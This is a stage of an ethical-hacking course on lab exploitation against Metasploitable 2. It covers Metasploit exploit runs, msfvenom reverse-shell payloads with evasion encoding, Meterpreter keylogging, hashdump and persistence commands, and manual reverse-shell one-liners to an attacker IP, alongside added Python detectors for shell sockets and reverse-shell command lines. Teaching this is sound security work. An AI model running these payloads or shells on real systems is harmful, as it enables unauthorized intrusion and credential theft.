Stage 08 — Exploitation Fundamentals
Gaining Initial Access Through Controlled Exploitation
Certified Ethical Hacking I Learning Path
Audience: Learners who have completed Stages 00-07

Welcome to Stage 08. You've found vulnerabilities; now it's time to prove their impact through controlled exploitation. This stage teaches the Metasploit Framework, payload generation, and establishing access to target systems.
⚠️ Critical Legal and Ethical Notice
ONLY exploit systems you own or have explicit written authorization to test. Unauthorized exploitation is illegal and can result in criminal prosecution, civil liability, and career destruction.
In this course, you will ONLY exploit:
- Metasploitable 2 (your own VM)
- Other intentionally vulnerable VMs you control
- Systems with written authorization
Prerequisites
- [ ] Completed Stages 00-07
- [ ] Understand vulnerability analysis
- [ ] Metasploitable 2 running and accessible
- [ ] Comfortable with command line
What You Will Learn
- Understand exploitation concepts
- Navigate and use Metasploit Framework
- Search for and select exploits
- Configure and execute exploits safely
- Generate payloads with msfvenom
- Establish reverse and bind shells
- Document exploitation professionally
Time Estimate: 40-50 hours
Part 1 — Exploitation Concepts (Milestone 1)
What is Exploitation?
Exploitation is taking advantage of a vulnerability to achieve unauthorized access.
```text
Exploitation Process

VULNERABILITY  ──►  EXPLOIT  ──►  PAYLOAD  ──►  ACCESS
      │                │             │            │
      ▼                ▼             ▼            ▼
  Weakness         Code that     Code that    Attacker
  in target        triggers      runs after   achieves
                   the vuln      success      objective

Example:
Buffer overflow  ──►  Exploit  ──►  Reverse  ──►  Shell on
in vsftpd             code          shell         target
```
Key Terminology
| Term | Definition |
|------|------------|
| Exploit | Code that takes advantage of a vulnerability |
| Payload | Code that runs after successful exploitation |
| Shellcode | Low-level payload, often for shell access |
| Listener | Service waiting for connections |
| Handler | Metasploit component managing payloads |
| Session | Active connection to compromised system |
| Stager | Small payload that downloads larger payload |
| Stage | Larger payload downloaded by stager |
Payload Types
```text
Payload Types

REVERSE SHELL
├── Target connects BACK to attacker
├── Attacker sets up listener
├── Bypasses inbound firewall rules
└── Most commonly used

BIND SHELL
├── Target opens port, waits for attacker
├── Attacker connects to target
├── May be blocked by firewall
└── Less common now

METERPRETER
├── Advanced Metasploit payload
├── In-memory execution
├── Encrypted communication
├── Rich feature set
└── Standard for Metasploit
```
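The two shell types above also look different from the defender's side, which is the quickest way to internalise the distinction: a reverse shell shows up on the target as a shell process owning an established outbound socket (typically with file descriptors 0, 1 and 2 all pointing at that socket, the `dup2` pattern), while a bind shell is a shell or netcat process sitting in LISTEN state. The Python below is an added example and not part of the course material; it parses constructed output in the column layout of `ss -tanp` on Linux (the hosts, PIDs and process names in the sample are invented) and flags both patterns.

```python
import re
from dataclasses import dataclass

# Constructed sample in the column layout of `ss -tanp` on Linux. The hosts,
# PIDs and processes are invented for this example, not captured anywhere.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port     Peer Address:Port    Process
ESTAB  0      0      192.168.56.101:22      192.168.56.1:51234   users:(("sshd",pid=1203,fd=4))
ESTAB  0      0      192.168.56.101:49152   192.168.56.1:4444    users:(("sh",pid=2210,fd=0),("sh",pid=2210,fd=1),("sh",pid=2210,fd=2))
LISTEN 0      10     0.0.0.0:5555           0.0.0.0:*            users:(("nc",pid=2301,fd=3))
ESTAB  0      0      192.168.56.101:80      192.168.56.1:50321   users:(("apache2",pid=910,fd=12))
"""

# Process names that should not normally own a TCP socket at all.
SHELL_PROCESSES = {"sh", "bash", "dash", "zsh", "nc", "ncat", "netcat", "socat"}

# One ("name",pid=N,fd=N) tuple inside the Process column.
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=(\d+)\)')


@dataclass
class Finding:
    kind: str               # "reverse-shell" (ESTAB) or "bind-shell" (LISTEN)
    process: str
    pid: int
    local: str
    peer: str
    stdio_redirected: bool  # fds 0, 1 and 2 all point at the socket (dup2 pattern)


def parse_ss(text):
    """Yield (state, local, peer, [(name, pid, fd), ...]) for each socket row."""
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 5)             # Process column may contain spaces
        if len(parts) < 6:
            continue
        state, _recvq, _sendq, local, peer, proc_col = parts
        procs = [(n, int(p), int(f)) for n, p, f in PROC_RE.findall(proc_col)]
        yield state, local, peer, procs


def find_shell_sockets(text):
    """Return a Finding for every socket owned by a shell-like process."""
    findings = []
    for state, local, peer, procs in parse_ss(text):
        shell_procs = [p for p in procs if p[0] in SHELL_PROCESSES]
        if not shell_procs:
            continue
        name, pid, _ = shell_procs[0]
        fds = {fd for n, p, fd in procs if p == pid}
        if state == "ESTAB":
            kind = "reverse-shell"   # target dialled out and a shell is attached
        elif state == "LISTEN":
            kind = "bind-shell"      # shell waiting for an inbound connection
        else:
            continue
        findings.append(Finding(kind, name, pid, local, peer, {0, 1, 2} <= fds))
    return findings


if __name__ == "__main__":
    for f in find_shell_sockets(SAMPLE_SS_OUTPUT):
        print(f"{f.kind:13} {f.process}(pid {f.pid}) {f.local} <-> {f.peer} "
              f"stdio_on_socket={f.stdio_redirected}")
```

The `stdio_redirected` flag is the strongest signal: a legitimate shell almost never has all three standard descriptors duplicated onto one TCP socket, which is exactly what `nc -e`, `bash -i >& /dev/tcp/...` and the Python `dup2` one-liner produce.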
Part 2 — Metasploit Framework Fundamentals (Milestone 2)
What is Metasploit?
The Metasploit Framework is the world's most used penetration testing tool:
- 2000+ exploits
- 500+ payloads
- Auxiliary modules for scanning
- Post-exploitation modules
- Meterpreter advanced payload
Starting Metasploit
```bash
# Start the database
sudo systemctl start postgresql

# Initialize database (first time)
sudo msfdb init

# Start Metasploit console
msfconsole

# With quiet mode
msfconsole -q
```
Metasploit Architecture
```text
Metasploit Module Types

EXPLOITS
└── Code to exploit vulnerabilities

PAYLOADS
├── Singles - Self-contained, small
├── Stagers - Set up the communication channel
└── Stages  - Larger payload components

AUXILIARY
└── Scanning, fuzzing, DoS, etc.

POST
└── Post-exploitation modules

ENCODERS
└── Obfuscate payloads

NOPS
└── Keep payload size consistent
```
Basic Commands
```text
# Help
msf6 > help

# Search for modules
msf6 > search [keyword]
msf6 > search type:exploit name:vsftpd
msf6 > search cve:2017-0144

# Use a module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# Show options
msf6 exploit(vsftpd_234_backdoor) > show options
msf6 exploit(vsftpd_234_backdoor) > show payloads
msf6 exploit(vsftpd_234_backdoor) > show targets

# Set options
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
msf6 exploit(vsftpd_234_backdoor) > set LHOST 192.168.56.1

# Get info
msf6 exploit(vsftpd_234_backdoor) > info

# Run exploit
msf6 exploit(vsftpd_234_backdoor) > exploit
msf6 exploit(vsftpd_234_backdoor) > run

# Background session
meterpreter > background

# List sessions
msf6 > sessions -l

# Interact with session
msf6 > sessions -i 1

# Kill session
msf6 > sessions -k 1
```
Workspace Management
```text
# List workspaces
msf6 > workspace

# Create workspace
msf6 > workspace -a engagement_name

# Switch workspace
msf6 > workspace engagement_name

# Delete workspace
msf6 > workspace -d engagement_name
```
Part 3 — Exploitation Workflow (Milestone 3)
Standard Workflow
1. SEARCH for the exploit: `search vsftpd`
2. USE the exploit: `use exploit/unix/ftp/vsftpd_234_backdoor`
3. SHOW options and set the required values: `show options`, then `set RHOSTS 192.168.56.101`
4. SELECT a payload (if needed): `show payloads`, then `set PAYLOAD cmd/unix/interact`
5. VERIFY settings: `show options`
6. EXECUTE: `exploit`
Hands-On: First Exploitation
```text
# Start Metasploit
msfconsole -q

# Exploit vsftpd 2.3.4 backdoor on Metasploitable
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
msf6 exploit(vsftpd_234_backdoor) > show options
msf6 exploit(vsftpd_234_backdoor) > exploit

# You should now have a shell; verify with:
whoami
id
hostname
```
Common Metasploitable Exploits
```text
# vsftpd 2.3.4 Backdoor
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS [target]
exploit

# Samba usermap_script
use exploit/multi/samba/usermap_script
set RHOSTS [target]
exploit

# distcc Daemon
use exploit/unix/misc/distcc_exec
set RHOSTS [target]
exploit

# IRC UnrealIRCd Backdoor
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS [target]
exploit

# Java RMI
use exploit/multi/misc/java_rmi_server
set RHOSTS [target]
exploit
```
Part 4 — Payload Generation with msfvenom (Milestone 4)
What is msfvenom?
msfvenom generates payloads for use outside of Metasploit:
- Standalone executables
- Shellcode for exploits
- Web shells
- Various formats
Basic Usage
```bash
# List payloads
msfvenom -l payloads

# List formats
msfvenom -l formats

# List encoders
msfvenom -l encoders

# Generate Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > shell.exe

# Generate Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf > shell.elf

# Generate PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f raw > shell.php

# Generate Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f raw > shell.py

# With encoding (evasion)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe
```
Common Payloads
| Payload | Use Case |
|---------|----------|
| windows/meterpreter/reverse_tcp | Windows, full features |
| windows/shell/reverse_tcp | Windows, basic shell |
| linux/x86/meterpreter/reverse_tcp | Linux x86, full features |
| linux/x64/shell_reverse_tcp | Linux x64, basic shell |
| php/meterpreter/reverse_tcp | Web server exploitation |
| java/meterpreter/reverse_tcp | Java environments |
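Metasploit encodes a lot of information in the payload path itself, and reading it correctly matters when pairing msfvenom output with a handler: `platform[/arch]/type/transport` with a slash between type and transport (e.g. `windows/meterpreter/reverse_tcp`) is a staged payload (stager plus stage, as defined in Part 1), whereas `type_transport` joined by an underscore (e.g. `linux/x64/shell_reverse_tcp`) is a stageless single, and a handler configured for one will not catch the other. The parser below is an added example, not code from the framework; the architecture list, the implicit x86 default for native platforms without an arch segment, and the `handler_settings` helper are my reading of the naming convention rather than an official API.

```python
from dataclasses import dataclass
from typing import Optional

# Native CPU architectures that can appear as the second path segment.
NATIVE_ARCHES = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe", "ppc", "ppc64"}
NATIVE_PLATFORMS = {"windows", "linux", "osx", "bsd", "solaris", "android"}
# Connection types used in this stage, longest first so suffix matching is unambiguous.
TRANSPORTS = sorted(
    ["reverse_tcp", "bind_tcp", "reverse_http", "reverse_https", "reverse_tcp_ssl", "bind_tcp_ssl"],
    key=len, reverse=True,
)


@dataclass
class PayloadName:
    name: str
    platform: str
    arch: str
    kind: str                 # "staged", "stageless" or "single"
    payload_type: str         # meterpreter, shell, ... (module path for singles)
    transport: Optional[str]  # reverse_tcp, bind_tcp, ... (None for singles)

    @property
    def direction(self):
        """'reverse' = target connects back to LHOST, 'bind' = target listens."""
        if self.transport is None:
            return None
        return "reverse" if self.transport.startswith("reverse_") else "bind"

    @property
    def staged(self):
        return self.kind == "staged"


def parse_payload(name):
    """Split a Metasploit payload path into its naming-convention components."""
    segs = name.split("/")
    platform, rest = segs[0], segs[1:]
    if rest and rest[0] in NATIVE_ARCHES:
        arch = rest.pop(0)
    elif platform in NATIVE_PLATFORMS:
        arch = "x86"          # assumption: implicit default when no arch segment is present
    else:
        arch = platform       # interpreter payloads (php, python, java, cmd) carry their own "arch"
    if len(rest) == 2 and rest[1] in TRANSPORTS:
        return PayloadName(name, platform, arch, "staged", rest[0], rest[1])   # type/transport
    if len(rest) == 1:
        for t in TRANSPORTS:
            if rest[0].endswith("_" + t):                                      # type_transport
                return PayloadName(name, platform, arch, "stageless", rest[0][: -len(t) - 1], t)
    return PayloadName(name, platform, arch, "single", "/".join(rest), None)


def handler_settings(name, host, port):
    """Return the 'set' lines exploit/multi/handler needs for this exact payload.
    For reverse payloads `host` is LHOST (our listener); for bind payloads it is
    RHOST (the target the handler dials). PAYLOAD must match the generated name
    exactly: a staged payload will not connect to a handler set to its stageless sibling."""
    p = parse_payload(name)
    lines = [f"set PAYLOAD {name}"]
    if p.direction == "reverse":
        lines += [f"set LHOST {host}", f"set LPORT {port}"]
    elif p.direction == "bind":
        lines += [f"set RHOST {host}", f"set LPORT {port}"]
    return lines


if __name__ == "__main__":
    for n in ["windows/meterpreter/reverse_tcp", "linux/x64/shell_reverse_tcp", "cmd/unix/interact"]:
        p = parse_payload(n)
        print(f"{n:35} {p.platform}/{p.arch} {p.kind:9} {p.payload_type} {p.transport} {p.direction}")
```

Run it against the table above and each row resolves to platform, architecture and staged/stageless; the last column tells you whether the handler needs LHOST (reverse) or RHOST (bind).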
Setting Up Handler
```text
# Start handler for your payload
msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(handler) > set LHOST 192.168.56.1
msf6 exploit(handler) > set LPORT 4444
msf6 exploit(handler) > exploit -j    # Run as job (background)
```
Hands-On: Payload Generation
```bash
# Generate a Linux payload
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf > ~/security-lab/payloads/shell.elf

# Make executable
chmod +x ~/security-lab/payloads/shell.elf

# Set up listener
nc -lvp 4444

# On target (simulated), execute payload
./shell.elf
```
Part 5 — Meterpreter (Milestone 5)
What is Meterpreter?
Meterpreter is Metasploit's advanced payload:
- Runs entirely in memory
- Encrypted communication
- Extensible with modules
- Powerful post-exploitation
Essential Meterpreter Commands
```text
# System info
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid

# File system
meterpreter > pwd
meterpreter > cd /tmp
meterpreter > ls
meterpreter > cat /etc/passwd
meterpreter > download /etc/passwd
meterpreter > upload /path/to/file.txt

# Process management
meterpreter > ps
meterpreter > migrate [PID]
meterpreter > kill [PID]

# Network
meterpreter > ipconfig
meterpreter > netstat
meterpreter > portfwd add -l 8080 -p 80 -r 127.0.0.1

# Shell access
meterpreter > shell    # Drop to system shell
meterpreter > execute -f cmd.exe -i -H

# Screenshots and keylogging
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump

# Privilege escalation
meterpreter > getsystem
meterpreter > run post/multi/recon/local_exploit_suggester

# Persistence
meterpreter > run persistence -h

# Hashdump (Windows)
meterpreter > hashdump

# Background
meterpreter > background
```
Part 6 — Manual Exploitation (Milestone 6)
Netcat Shells
```bash
# Listener (attacker)
nc -lvp 4444

# Reverse shell (target)
nc -e /bin/bash [attacker_ip] 4444

# If nc doesn't have -e
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc [attacker_ip] 4444 > /tmp/f
```
Bash Reverse Shell
```bash
# On target
bash -i >& /dev/tcp/[attacker_ip]/4444 0>&1
```
Python Reverse Shell
```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[attacker_ip]",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
```
PHP Reverse Shell
```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[attacker_ip]/4444 0>&1'"); ?>
```
Upgrading Shells
```bash
# Upgrade to TTY
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
Full TTY upgrade:
```bash
# In the reverse shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background the shell

# On attacker:
stty raw -echo; fg

# Back in the shell:
export TERM=xterm
```
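Every manual shell in this part leaves a characteristic command line and process ancestry on the target, which is what host-based detection keys on: `/dev/tcp/` redirections, `nc -e`, a `mkfifo` piped into netcat, `socket` plus `dup2` one-liners, `pty.spawn` upgrades, and any interactive shell whose parent is a network service such as `apache2` or `vsftpd`. The Python below is an added example, not part of the course; it runs those rules over a constructed list of process-execution events (the PIDs, parents and command lines are invented, modelled on the commands shown above) and scores each hit so the lab machine's own telemetry can be checked after an exercise.

```python
import re

# Detection rules: (name, pattern applied to the process command line).
RULES = [
    ("bash_dev_tcp",               re.compile(r"/dev/(tcp|udp)/")),
    ("nc_exec_flag",               re.compile(r"\b(nc|ncat|netcat)\b[^|;]*\s-[a-z]*[ec]\b")),
    ("mkfifo_pipe_to_nc",          re.compile(r"mkfifo\b.*\|\s*(nc|ncat|netcat)\b")),
    ("python_socket_dup2",         re.compile(r"socket\.socket.*dup2")),
    ("pty_spawn",                  re.compile(r"pty\.spawn\(")),
    ("interactive_shell_redirect", re.compile(r"\b(ba|da)?sh\s+-i\b.*[>&|]")),
]

# Interpreters/shells that a network service has little reason to spawn interactively.
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl", "php", "nc", "ncat", "socat"}
SERVICE_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "vsftpd", "smbd", "distccd", "java", "tomcat"}

# Constructed process-execution events (the shape an EDR or auditd pipeline would
# give you); PIDs, parents and command lines are invented for this example.
SAMPLE_EVENTS = [
    {"pid": 3101, "ppid": 910,  "parent_comm": "apache2", "comm": "sh",
     "cmdline": "sh -c bash -i >& /dev/tcp/192.168.56.1/4444 0>&1"},
    {"pid": 3120, "ppid": 1,    "parent_comm": "systemd", "comm": "bash",
     "cmdline": "bash -c ls -la /var/log"},
    {"pid": 3133, "ppid": 1203, "parent_comm": "sshd",    "comm": "python3",
     "cmdline": 'python3 -c import pty; pty.spawn("/bin/bash")'},
    {"pid": 3140, "ppid": 2222, "parent_comm": "vsftpd",  "comm": "sh",
     "cmdline": "sh -c rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.1 4444 > /tmp/f"},
    {"pid": 3150, "ppid": 1203, "parent_comm": "sshd",    "comm": "nc",
     "cmdline": "nc -zv 192.168.56.101 80"},
    {"pid": 3160, "ppid": 910,  "parent_comm": "apache2", "comm": "python",
     "cmdline": 'python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
                's.connect(("192.168.56.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
                'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'},
]


def analyze_events(events):
    """Return one finding per event that matches at least one command-line rule.
    Parent context (shell spawned by a network service) raises the score but is
    deliberately not enough to alert on its own: it is too noisy by itself."""
    findings = []
    for ev in events:
        hits = [name for name, rx in RULES if rx.search(ev["cmdline"])]
        if not hits:
            continue
        service_parent = ev["comm"] in SHELL_LIKE and ev["parent_comm"] in SERVICE_PARENTS
        score = len(hits) + (1 if service_parent else 0)
        findings.append({
            "pid": ev["pid"], "comm": ev["comm"], "parent": ev["parent_comm"],
            "rules": hits, "service_parent": service_parent,
            "severity": "high" if score >= 2 else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] pid {f['pid']} {f['parent']} -> {f['comm']}: {', '.join(f['rules'])}")
```

Note what does not fire: a plain `bash -c ls` and a port check with `nc -zv` produce no finding, because the rules look for the shell-to-socket plumbing (redirection to `/dev/tcp`, `-e`, a FIFO loop, `dup2`) rather than for the tool name alone.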
Part 7 — Exploitation Documentation (Milestone 7)
What to Document
Every exploitation attempt should be documented:
- Target information
- Vulnerability exploited
- Exploit used
- Payload configuration
- Evidence of access
- Commands executed
Documentation Template
````markdown
# Exploitation Report

## Target
- IP: 192.168.56.101
- Service: vsftpd 2.3.4
- Port: 21

## Vulnerability
- CVE: CVE-2011-2523
- Description: vsftpd 2.3.4 backdoor command execution

## Exploitation

### Exploit Used
exploit/unix/ftp/vsftpd_234_backdoor

### Configuration
RHOSTS: 192.168.56.101
RPORT: 21

### Execution
```
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.56.101
msf6 > exploit
[*] Command shell session 1 opened
```

## Evidence of Access
```
whoami
root
id
uid=0(root) gid=0(root)
hostname
metasploitable
```

## Impact
- Full root access obtained
- Complete system compromise
- Access to all files and data

## Recommendations
- Update vsftpd to latest version
- Remove backdoored version
- Audit for unauthorized access
````
Stage 08 Assessment
Written Assessment
- What is the difference between an exploit and a payload?
- Explain reverse shell vs bind shell.
- What is Meterpreter and why is it preferred?
- How do you search for exploits in Metasploit?
- What is msfvenom used for?
- How do you set up a handler for a payload?
- List five essential Meterpreter commands.
- How do you upgrade a basic shell to TTY?
- What must be documented during exploitation?
- Why is exploitation documentation important?
Practical Assessment
- Exploit at least three services on Metasploitable
- Generate a custom payload with msfvenom
- Establish and interact with a Meterpreter session
- Create manual reverse shell without Metasploit
- Document all exploitation with evidence
Stage 08 Completion Checklist
- [ ] Understand exploitation concepts
- [ ] Can navigate Metasploit Framework
- [ ] Can search for and use exploits
- [ ] Can configure payloads
- [ ] Can use msfvenom
- [ ] Can use Meterpreter
- [ ] Can create manual shells
- [ ] Can document exploitation properly
What's Next: Stage 09 Preview
In Stage 09 — Post-Exploitation Concepts, you will:
- Understand post-exploitation objectives
- Learn privilege escalation techniques
- Understand persistence concepts
- Learn about lateral movement
Commit and proceed when ready:
```bash
cd ~/security-lab
git add .
git commit -m "Complete Stage 08 - Exploitation Fundamentals"
```